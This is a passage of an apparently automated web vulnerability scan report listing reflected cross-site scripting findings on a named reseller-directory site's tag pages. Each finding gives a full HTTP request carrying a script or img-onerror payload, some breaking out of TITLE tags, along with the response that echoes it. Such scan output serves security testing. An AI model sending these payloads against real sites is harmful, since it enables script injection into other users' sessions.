The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fdbd1<img%20src%3da%20onerror%3dalert(1)>608f8d056dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdbd1<img src=a onerror=alert(1)>608f8d056dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/search.php/fdbd1<img%20src%3da%20onerror%3dalert(1)>608f8d056dd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: searc
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : search.php/fdbd1<img src=a onerror=alert(1)>608f8d056dd]</td>
...[SNIP]...

2.4398. http://www.resellerbase.com/tag/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload aaed2</title><img%20src%3da%20onerror%3dalert(1)>370aa650ae0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aaed2</title><img src=a onerror=alert(1)>370aa650ae0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/search.php/aaed2</title><img%20src%3da%20onerror%3dalert(1)>370aa650ae0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: search.php/aaed2</title><img src=a onerror=alert(1)>370aa650ae0</title>
...[SNIP]...

2.4399. http://www.resellerbase.com/tag/seo [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/seo

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e1ff<script>alert(1)</script>b8ab21b1769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9e1ff<script>alert(1)</script>b8ab21b1769/seo HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag9e1ff<script>alert(1)</script>b8ab21b1769/seo was not found on this server.</p>
...[SNIP]...

2.4400. http://www.resellerbase.com/tag/sex [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/sex

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d608f<script>alert(1)</script>f51c239180ea174d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagd608f<script>alert(1)</script>f51c239180ea174d1/sex?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/sex
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd608f<script>alert(1)</script>f51c239180ea174d1/sex?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4401. http://www.resellerbase.com/tag/sex [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/sex

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 738e7<script>alert(1)</script>3fb507e2afc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag738e7<script>alert(1)</script>3fb507e2afc/sex HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag738e7<script>alert(1)</script>3fb507e2afc/sex was not found on this server.</p>
...[SNIP]...

2.4402. http://www.resellerbase.com/tag/sex [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/sex

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2c97<img%20src%3da%20onerror%3dalert(1)>3280a3016044a12a was submitted in the REST URL parameter 2. This input was echoed as b2c97<img src=a onerror=alert(1)>3280a3016044a12a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/sexb2c97<img%20src%3da%20onerror%3dalert(1)>3280a3016044a12a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/sex
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.4403. http://www.resellerbase.com/tag/sex [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/sex

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1fbce</title><img%20src%3da%20onerror%3dalert(1)>ee34a9fc2a2 was submitted in the REST URL parameter 2. This input was echoed as 1fbce</title><img src=a onerror=alert(1)>ee34a9fc2a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/sex1fbce</title><img%20src%3da%20onerror%3dalert(1)>ee34a9fc2a2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sex1fbce</title><img src=a onerror=alert(1)>ee34a9fc2a2</title>
...[SNIP]...

2.4404. http://www.resellerbase.com/tag/sex [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/sex

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b99ca<img%20src%3da%20onerror%3dalert(1)>c9978f9236 was submitted in the REST URL parameter 2. This input was echoed as b99ca<img src=a onerror=alert(1)>c9978f9236 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/sexb99ca<img%20src%3da%20onerror%3dalert(1)>c9978f9236 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sexb9
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : sexb99ca<img src=a onerror=alert(1)>c9978f9236]</td>
...[SNIP]...

2.4405. http://www.resellerbase.com/tag/sex [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/sex

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 560fe</title><img%20src%3da%20onerror%3dalert(1)>67e84b363ff2c2d9f was submitted in the REST URL parameter 2. This input was echoed as 560fe</title><img src=a onerror=alert(1)>67e84b363ff2c2d9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/sex560fe</title><img%20src%3da%20onerror%3dalert(1)>67e84b363ff2c2d9f?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/sex
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sex560fe</title><img src=a onerror=alert(1)>67e84b363ff2c2d9f</title>
...[SNIP]...

2.4406. http://www.resellerbase.com/tag/sex+shop [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/sex+shop

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d963d<script>alert(1)</script>4de84c32c48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagd963d<script>alert(1)</script>4de84c32c48/sex+shop HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:55:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd963d<script>alert(1)</script>4de84c32c48/sex+shop was not found on this server.</p>
...[SNIP]...

2.4407. http://www.resellerbase.com/tag/sex+shop [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/sex+shop

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ddb20<img%20src%3da%20onerror%3dalert(1)>e83c2a65c0b was submitted in the REST URL parameter 2. This input was echoed as ddb20<img src=a onerror=alert(1)>e83c2a65c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/sex+shopddb20<img%20src%3da%20onerror%3dalert(1)>e83c2a65c0b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sex s
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : sex shopddb20<img src=a onerror=alert(1)>e83c2a65c0b]</td>
...[SNIP]...

2.4408. http://www.resellerbase.com/tag/sex+shop [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/sex+shop

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3f44d</title><img%20src%3da%20onerror%3dalert(1)>3dedf11c750 was submitted in the REST URL parameter 2. This input was echoed as 3f44d</title><img src=a onerror=alert(1)>3dedf11c750 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/sex+shop3f44d</title><img%20src%3da%20onerror%3dalert(1)>3dedf11c750 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: sex shop3f44d</title><img src=a onerror=alert(1)>3dedf11c750</title>
...[SNIP]...

2.4409. http://www.resellerbase.com/tag/singels [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/singels

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0368<script>alert(1)</script>58734a5e811958f2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagb0368<script>alert(1)</script>58734a5e811958f2e/singels?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/singels
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagb0368<script>alert(1)</script>58734a5e811958f2e/singels?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4410. http://www.resellerbase.com/tag/singels [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/singels

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a42c<script>alert(1)</script>131bfe4a44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag2a42c<script>alert(1)</script>131bfe4a44/singels HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2a42c<script>alert(1)</script>131bfe4a44/singels was not found on this server.</p>
...[SNIP]...

2.4411. http://www.resellerbase.com/tag/singels [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/singels

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 87378</title><img%20src%3da%20onerror%3dalert(1)>e5f95348a0fe43b16 was submitted in the REST URL parameter 2. This input was echoed as 87378</title><img src=a onerror=alert(1)>e5f95348a0fe43b16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/singels87378</title><img%20src%3da%20onerror%3dalert(1)>e5f95348a0fe43b16?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/singels
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: singels87378</title><img src=a onerror=alert(1)>e5f95348a0fe43b16</title>
...[SNIP]...

2.4412. http://www.resellerbase.com/tag/singels [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/singels

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66a03<img%20src%3da%20onerror%3dalert(1)>a1b8f542f3f was submitted in the REST URL parameter 2. This input was echoed as 66a03<img src=a onerror=alert(1)>a1b8f542f3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/singels66a03<img%20src%3da%20onerror%3dalert(1)>a1b8f542f3f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: singe
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : singels66a03<img src=a onerror=alert(1)>a1b8f542f3f]</td>
...[SNIP]...

2.4413. http://www.resellerbase.com/tag/singels [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/singels

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48ee2<img%20src%3da%20onerror%3dalert(1)>2e64d6a6e8d1365b9 was submitted in the REST URL parameter 2. This input was echoed as 48ee2<img src=a onerror=alert(1)>2e64d6a6e8d1365b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/singels48ee2<img%20src%3da%20onerror%3dalert(1)>2e64d6a6e8d1365b9?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/singels
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: singe
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : singels48ee2<img src=a onerror=alert(1)>2e64d6a6e8d1365b9]</td>
...[SNIP]...

2.4414. http://www.resellerbase.com/tag/singels [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/singels

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 32a24</title><img%20src%3da%20onerror%3dalert(1)>875c1fb6929 was submitted in the REST URL parameter 2. This input was echoed as 32a24</title><img src=a onerror=alert(1)>875c1fb6929 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/singels32a24</title><img%20src%3da%20onerror%3dalert(1)>875c1fb6929 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: singels32a24</title><img src=a onerror=alert(1)>875c1fb6929</title>
...[SNIP]...

2.4415. http://www.resellerbase.com/tag/software [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/software

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3e111<script>alert(1)</script>62c9d4d91768b83c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

